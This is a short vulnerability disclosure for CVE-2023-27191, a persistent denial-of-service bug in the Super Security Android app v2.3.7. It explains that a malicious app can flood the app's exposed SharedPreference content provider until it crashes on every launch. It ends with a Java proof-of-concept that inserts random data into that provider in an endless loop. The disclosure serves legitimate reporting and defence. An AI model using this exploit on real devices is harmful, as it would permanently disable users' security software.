Denial of Service exists in Super Secuirty(CVE-2023-27191)
Vendor:DUALSPACE(http://www.dualspace.com/pc/en/products.html)
Affected product:Super Security (com.ludashi.security)
Version:2.3.7
Download link:https://apkpure.com/cn/super-security-virus-cleaner/com.ludashi.security
Description of the vulnerability for use in the CVE:An issue found in DUALSPACE Super Secuirty v.2.3.7 allows an attacker to cause a denial of service via the SharedPreference files.
Additional information:The Super Security app is a security application that offers several security-related functions. Upon opening the app, it loads the SharedPreference files into memory. If a malicious app injects a large amount of data into these files, the Super Security app will load excessive data into memory, which can trigger an OOM error and cause the app to crash. Even worse, simply restarting the app will not fix the security issue, as the injected data is persistent in the SharedPreference files. In practice, this means that the Super Security app becomes unable to launch successfully.
poc:
public void attack() {
ContentResolver contentResolver = this.getApplicationContext().getContentResolver();
Uri uri = Uri.parse("content://com.ludashi.security.SharedPrefProvider");
ContentValues contentValues = new ContentValues();
While(true){
contentValues.put("file_name","__default__");
contentValues.put("type",4);
contentValues.put("key",RandomString);
contentValues.put("value",RandomString);
contentResolver.insert(uri, contentValues);
}
}